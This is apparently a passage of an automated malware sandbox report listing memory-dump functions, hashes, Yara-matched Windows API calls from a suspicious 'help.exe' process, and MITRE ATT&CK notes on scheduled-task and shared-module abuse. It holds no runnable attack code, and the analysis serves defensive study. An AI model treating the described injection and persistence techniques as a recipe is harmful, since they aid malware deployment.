Opcode Fuzzy Hash: df1dc49350715836eafb9316735c1ab0d268254bdfd9d0ee2e7b3daed1b5e0ca
Instruction Fuzzy Hash: A190026134100C03D140719984147070006E7E0741F51C111A10186A4DCA5A8A6976F5

Uniqueness

Uniqueness Score: -1.00%

Function 0183A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce4451280e89e49032d37162da6bffc9aebbe4ebf10a30f3caddbd9ea0b68d8
Instruction ID: a153efdfaa36d54b3eb3f7e7656171275a327fcadbc836a580db8c5b6f8ebb06
Opcode Fuzzy Hash: 3ce4451280e89e49032d37162da6bffc9aebbe4ebf10a30f3caddbd9ea0b68d8
Instruction Fuzzy Hash: F8900271301004539500A6D95804A4A4105A7F0341B51D115A50086A4CC99889656165

Uniqueness

Uniqueness Score: -1.00%

Function 01839730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e9151499f026a5d5c19075ee4ba60edb76257b9d417ae96d265579d337b38e
Instruction ID: 26700b70eb34885faaaa11a35239d0ac11e34d1ac2767e9d15edfe190a8b4eb8
Opcode Fuzzy Hash: 24e9151499f026a5d5c19075ee4ba60edb76257b9d417ae96d265579d337b38e
Instruction Fuzzy Hash: EC90026170500803D140719954187060015A7E0341F51D111A10186A4DCA9D8B5976E5

Uniqueness

Uniqueness Score: -1.00%

Function 01839760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c538a2fe639aac7021e2595ea18edcce3c0d2ba0f040d57b4fd2bc87ddae4bb
Instruction ID: ef138673054a8adceaf2cbabed5933e0d2941a2452c9c0674ce67134e39d956b
Opcode Fuzzy Hash: 1c538a2fe639aac7021e2595ea18edcce3c0d2ba0f040d57b4fd2bc87ddae4bb
Instruction Fuzzy Hash: F090027130100803D100619955087070005A7E0341F51D511A14186A8DDA9A89557165

Uniqueness

Uniqueness Score: -1.00%

Function 01839770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52fc84893fad4b87342c6116538ee49ee093b33cba4eb5c8c8d6a73fb6177990
Instruction ID: d3430e602b89d73e89c7ce67986841f058d260e84ce7fe37660ae1622d67136c
Opcode Fuzzy Hash: 52fc84893fad4b87342c6116538ee49ee093b33cba4eb5c8c8d6a73fb6177990
Instruction Fuzzy Hash: 8E90026130504843D10065995408A060005A7E0345F51D111A20586E5DCA798955B175

Uniqueness

Uniqueness Score: -1.00%

Function 0183A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c03a65221c29f50b0ed834f1942563681a9a989b75e4d63a8ee72890cad44dde
Instruction ID: 00dd7369ec6636b436322f2814cc434bd925fa98c8d84b1034d2916a283b3aa3
Opcode Fuzzy Hash: c03a65221c29f50b0ed834f1942563681a9a989b75e4d63a8ee72890cad44dde
Instruction Fuzzy Hash: 6A90027530504843D50065995804A870005A7E0345F51D511A14186ECDCA988965B165

Uniqueness

Uniqueness Score: -1.00%

Function 01839A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 303a09b898309d8894e4ad58c41b682dc5f1aba24489d2e321a5c78f8b192188
Instruction ID: c5f9f2071d47f7d20ce60bbfe8c79939e793790c11b9ab008db0a82562fbffdb
Opcode Fuzzy Hash: 303a09b898309d8894e4ad58c41b682dc5f1aba24489d2e321a5c78f8b192188
Instruction Fuzzy Hash: 7F90026130144843D14062994804B0F4105A7F1342F91C119A514A6A4CCD5989596765

Uniqueness

Uniqueness Score: -1.00%

Function 018396D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb83c677e9395e77524e367d6fa34299d0e26b51c025268833c08a66732f209
Instruction ID: 9fd01668ae5ea539de9c1bf4e24f3742519d491e6a6fe9db2e57ccb391fe9510
Opcode Fuzzy Hash: 1fb83c677e9395e77524e367d6fa34299d0e26b51c025268833c08a66732f209
Instruction Fuzzy Hash: E490027130100C43D10061994404B460005A7F0341F51C116A11187A4DCA59C9557565

Uniqueness

Uniqueness Score: -1.00%

Function 01839610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 350ed081ad1b993207b882b95feeedc8662e08a22825573698a1fa9e3750a7ea
Instruction ID: d1d5236d47cf4d9444b1f6cba8e20f4df4235000c099b88e737ac60c7c0f4aa7
Opcode Fuzzy Hash: 350ed081ad1b993207b882b95feeedc8662e08a22825573698a1fa9e3750a7ea
Instruction Fuzzy Hash: 7990027170500C03D150719944147460005A7E0341F51C111A10187A4DCB998B5976E5

Uniqueness

Uniqueness Score: -1.00%

Function 01839A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2f7396e701daed3af2a79193b872a9960f92b309bcc7530aa41f5b915604c8d
Instruction ID: 2637caa5adcb83c59b03453f39c1f4ece4e6a6be6d300ed7dc4c7f6865b71b58
Opcode Fuzzy Hash: f2f7396e701daed3af2a79193b872a9960f92b309bcc7530aa41f5b915604c8d
Instruction Fuzzy Hash: 1090027130140803D100619948087470005A7E0342F51C111A61586A5ECAA9C9957575

Uniqueness

Uniqueness Score: -1.00%

Function 01839650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce61f957d7e264b0711286de370b9135913565c85477950fd14a5c8f2e8eb170
Instruction ID: ea36a02130784a975c7eed2196a7af421a7ed59b20d327d4f4676e328640098a
Opcode Fuzzy Hash: ce61f957d7e264b0711286de370b9135913565c85477950fd14a5c8f2e8eb170
Instruction Fuzzy Hash: A890027130504C43D14071994404A460015A7E0345F51C111A10587E4DDA698E59B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 01839670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: b3d5092653555e6110917f060605e5a656adfe70baf1f244d6fc341380a5fb50
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0188FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0188FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0183CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01885720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01885720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0188fdda
0x0188fde2
0x0188fde5
0x0188fdec
0x0188fdfa
0x0188fdff
0x0188fe0a
0x0188fe0f
0x0188fe17
0x0188fe1e
0x0188fe19
0x0188fe19
0x0188fe19
0x0188fe20
0x0188fe21
0x0188fe22
0x0188fe25
0x0188fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0188FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0188FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0188FE01

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 7729fa9f39e6543d0cc3dec0c6c287dfc1c4c720c10cf175de18606866be1a03
Instruction ID: 6fb73664d459673ae91e10473c2af5e3e806a60b7b6ec30187c04e409754f003
Opcode Fuzzy Hash: 7729fa9f39e6543d0cc3dec0c6c287dfc1c4c720c10cf175de18606866be1a03
Instruction Fuzzy Hash: 26F0FC721001017FD6203A49DC06F23BF9ADB44730F144315F714951E1DA62F97086F1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: help.exe PID: 6756 Parent PID: 3292 help.exeCOMMON

Executed Functions

Function 02B585E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02B53BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B53BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02B5862D

Strings

.z`, xrefs: 02B5861D, 02B58628

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: e4241e047a60e15315213dd62cb3c43905086f4d24e39689d56de14f19c8a428
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 7BF0BDB2204208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B58690, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02B53D72,5E972F65,FFFFFFFF,02B53A31,?,?,02B53D72,?,02B53A31,FFFFFFFF,5E972F65,02B53D72,?,00000000), ref: 02B586D5

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 04a8723a940cbf11fff9cb4dbc121f5588236c6458c9dae5c4efaafdb92b0161
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 15F0A4B2200218ABCB14DF99DC84EEB77ADAF8C754F158248BE1D97241D630E951CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B587C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B42D11,00002000,00003000,00000004), ref: 02B587F9

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 41dde89cf30a278708a185e61e1da5fb8e30f7f4e6b4042fa559d585afa5692c
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: F2F015B2200218ABCB14DF89CC80EAB77ADAF8C750F118148FE0897241C630F910CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B587C2, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B42D11,00002000,00003000,00000004), ref: 02B587F9

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
Instruction ID: 0469472f3e6a5b28220e0a41ac03361045c70d907e7954a64897e24e88f99ec8
Opcode Fuzzy Hash: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
Instruction Fuzzy Hash: FBF015B2200118AFCB14DF98CC80EEB77A9AF8C350F118248FE0897240C630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B58710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02B53D50,?,?,02B53D50,00000000,FFFFFFFF), ref: 02B58735

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: ed0c44000a27cd35b22f5ecd2a92868511d347e611d0b31bb83dddf291c7ed2c
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 5ED01275200214BBD710EB98CC45F977B5DEF48750F154495BA185B241C530F600C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 02B57300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02B573A8

Strings

net.dll, xrefs: 02B57371, 02B573F7, 02B573CF, 02B573DB, 02B57403
wininet.dll, xrefs: 02B5735E, 02B57367

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 193a2a5937f48aa431d760a8b037495f715b2552ad46dcebed2533b4288bc998
Instruction ID: 8b485c5d851b9b5b61c49fec95130a30d0760fd6dc1392f8758e04e5e9198eee
Opcode Fuzzy Hash: 193a2a5937f48aa431d760a8b037495f715b2552ad46dcebed2533b4288bc998
Instruction Fuzzy Hash: FD317EB6642600ABC711EF64C8A1FABF7B9FF88700F04855DFA195B241DB70A546CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B572FB, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 76sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02B573A8

Strings

net.dll, xrefs: 02B57371, 02B573CF, 02B573DB
wininet.dll, xrefs: 02B5735E, 02B57367

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 29f2bc540b3c2cd3f535996effc68decd9f08f1dfd74d5a325f7cedc53894be1
Instruction ID: 3c70b9d68937faf3879f67cee896bc6e167ed28c9cc436334fa7e5c2701a4a75
Opcode Fuzzy Hash: 29f2bc540b3c2cd3f535996effc68decd9f08f1dfd74d5a325f7cedc53894be1
Instruction Fuzzy Hash: BA21BFB1A41600ABCB11DF64C8A1FABB7B4FF88700F04819EFA195F241D770A446DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B58922, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B43B93), ref: 02B5891D

Strings

.z`, xrefs: 02B5890C, 02B58918

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: a05ec17e7f9f0d10d431df1331ebf750c511b1b0f8539fc09e21d4b323c1b510
Instruction ID: 2f1c898a418fbd31c7d69649965253cdab983e66613c674d68824009959bf215
Opcode Fuzzy Hash: a05ec17e7f9f0d10d431df1331ebf750c511b1b0f8539fc09e21d4b323c1b510
Instruction Fuzzy Hash: DDF085B1204228BBCB18DF68CC48FAB3769BF88750F008098FD489B242D630E941CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B588E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B43B93), ref: 02B5891D

Strings

.z`, xrefs: 02B5890C, 02B58918

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: d9d257eb632d21a4ed4dcdef5d0637cdb087d4db4e7ac56a1bc295fe11807e82
Instruction ID: d1e7951dfc9f1c578825e75644dd77ca42ee159e3844ca1e05c03e5576963c38
Opcode Fuzzy Hash: d9d257eb632d21a4ed4dcdef5d0637cdb087d4db4e7ac56a1bc295fe11807e82
Instruction Fuzzy Hash: 5FE06DBA244614BFC718DFA8CC45EA77769EF88350F014549FD289B355C230E914CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 02B588F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B43B93), ref: 02B5891D

Strings

.z`, xrefs: 02B5890C, 02B58918

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: e46acf70fa0296d3b3601cc40c9f33adfbd13aac1ba4226ef9aed6f9db517c7f
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 9FE046B1200218BBDB18EFA9CC48EA777ADEF88750F018598FE085B241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02B47280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B472DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B472FB

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a828c58be3bc4fc0de638eec110186a3a265f2fbf0af0036c593e4a20455cbbc
Instruction ID: 0346063c3d99b5cd8c9be1d67e79f11f1da3e1b561c9583afb8d463ab3d1e6b0
Opcode Fuzzy Hash: a828c58be3bc4fc0de638eec110186a3a265f2fbf0af0036c593e4a20455cbbc
Instruction Fuzzy Hash: 9F01F731A8022877E721A6948C42FBF776C9B01B50F040194FF04BA1C0EF9469069AF5

Uniqueness

Uniqueness Score: -1.00%

Function 02B49B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.KERNEL32(00000000,00000000,00000003,?), ref: 02B49BB2

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction ID: 2ea8fc89d116b6254045661d5c3106249be77ceb714140e6b06c177191a8d217
Opcode Fuzzy Hash: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction Fuzzy Hash: F1010CB5D4020DABDF10DAA4DC81F9EB7B99B54208F0041E5ED08AB284FA31EA148B91

Uniqueness

Uniqueness Score: -1.00%

Function 02B57430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B4CCF0,?,?), ref: 02B5746C

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 8e7047a9cb8df936ba72e981128d582d5b245ee00216b9e7364ec18dfb279628
Instruction ID: 084f525bc11f96581f5c27ed48cef0c7bfb58523a9ca98e0e69616f305e4863e
Opcode Fuzzy Hash: 8e7047a9cb8df936ba72e981128d582d5b245ee00216b9e7364ec18dfb279628
Instruction Fuzzy Hash: 8DE092333803143AE33065A9AC02FA7B3DCCB81B60F540066FA4DEB2C0D995F80246A8

Uniqueness

Uniqueness Score: -1.00%

Function 02B57426, Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B4CCF0,?,?), ref: 02B5746C

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 38c86605ebbfdc29bf3fc2c0a99f6f5fcebd6fba47b8e428e16a01f79e180b20
Instruction ID: c7855335d3f28aceb6a2c00db90a4beb420b6ffd4407ec2f9848afc7fac84d46
Opcode Fuzzy Hash: 38c86605ebbfdc29bf3fc2c0a99f6f5fcebd6fba47b8e428e16a01f79e180b20
Instruction Fuzzy Hash: 77F092767812103AE23165A89C02FE777EACB95F10F54415AFA4EAF2C1C995B80247B5

Uniqueness

Uniqueness Score: -1.00%

Function 02B58200, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetMagnificationDesktopColorEffect.USER32(001F0001,02B4873C,?,02B4D144,?,02B4873C,001F0001,?,00000000), ref: 02B58231

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: ColorDesktopEffectMagnification
String ID:
API String ID: 2656993766-0
Opcode ID: 4f971f71f869949e99f925280306ad068c1036b3c7f50cce473518fb1ab6f422
Instruction ID: 2174c56c3c262ae2c244d0c4e4c3a89a1c478ab98e801a4b5f6309f437ccf9ed
Opcode Fuzzy Hash: 4f971f71f869949e99f925280306ad068c1036b3c7f50cce473518fb1ab6f422
Instruction Fuzzy Hash: 9DE0E5B5200218ABDB14DF98CC85EA777ADAF88650F118558BA189B241C630F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 02B58A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02B4CFC2,02B4CFC2,?,00000000,?,?), ref: 02B58A80

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 344a468fa48cdb83ca9b2cd7484c577ebab992d7934ffd72dae7fcbf3b63e3be
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 1BE01AB1200218ABDB10DF59CC84EE737ADAF88650F018154FE085B241CA30E910CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 02B588B0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.KERNEL32(02B53536,?,02B53CAF,02B53CAF,?,02B53536,?,?,?,?,?,00000000,00000000,?), ref: 02B588DD

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 500636a8e1d80058a9654b4c0b7607d3a0ac43948b9ec53f8bbea872177df603
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 2EE012B1200218ABDB14EF99CC44EA777ADAF88650F118598FE085B241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02B4D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02B47C83,?), ref: 02B4D45B

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: 2dad83398570de396c80c7291f05ea713fb86860e78ef95991830b581b888dbc
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: 6FD05E717503042AE610AAA49C12F2632C99B45A44F4940A4FA489A3C3DA50E4008561

Uniqueness

Uniqueness Score: -1.00%

Function 02B4D427, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02B47C83,?), ref: 02B4D45B

Memory Dump Source

Source File: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Offset: 02B40000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1f9848deb416f11578b6449db3ed3cde44ec181d8b4685df8d899fe9f720ad71
Instruction ID: 14f6a2f98f4615ccc6e8236a7c69603f1b204a591dc3200d4c95395960cae3bc
Opcode Fuzzy Hash: 1f9848deb416f11578b6449db3ed3cde44ec181d8b4685df8d899fe9f720ad71
Instruction Fuzzy Hash: 11D0C2716502012AE604EB60EC12F2A6789AB02740F490094F604FF1D3CE10A0018A24

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

